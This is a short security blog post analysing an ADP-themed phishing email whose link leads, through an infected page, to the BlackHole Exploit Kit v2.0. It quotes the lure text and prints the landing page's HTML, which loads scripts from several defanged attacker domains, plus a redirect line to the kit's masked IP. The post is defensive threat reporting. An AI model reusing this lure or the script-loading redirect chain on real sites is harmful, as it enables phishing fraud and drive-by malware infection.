"ADP Funding Notification – Debit Draft" mail leads to BlackHole Exploit v2.0

Today, One of our visitor informed about an ADP notification spam mail which is similar to a spam mail intercepted by Mx Lab. Few months back, MX Lab intercepted a spam mail that leads to the BlackHole.

"Your Transaction Report(s) have been uploaded to the web site: https://www.flexdirect.adp.com/client/login.aspx .

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You, ADP Benefit Services"

The mail displays the original link but actually it is hyper link to malicious page.  A small trick by cyber criminals in order to lure recipient into believing the e-mail is legitimate.

If the recipient click the link, it will leads to a "hxxp://www.smilek**.com/gc4pLf0n/index.html".  The site is infected and has the following script :

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://www.arm**ies.com.ar/QbCwcwN5/js.js"></script>
<script type="text/javascript" src="hxxp://remotepcs**rity.net/0RUuWs5o/js.js"></script>
<script type="text/javascript" src="hxxp://www.ski**ll.net/p10h6Ldg/js.js"></script>
</html>

The above code loads javascript from three different domain. But all domains has the same script inside the file : "document.location='hxxp://209.59.*.*/links/deep_recover-result.php';" .  It is code for redirecting the page to 209.59.**.

After further analysis, i found that the IP hosts the latest version of BlackHole Exploit kit (v2.0).

We have to thank our visitor "David Gosche" for reporting about this email.  If you also have received these kind of spam mails, feel free to report to us.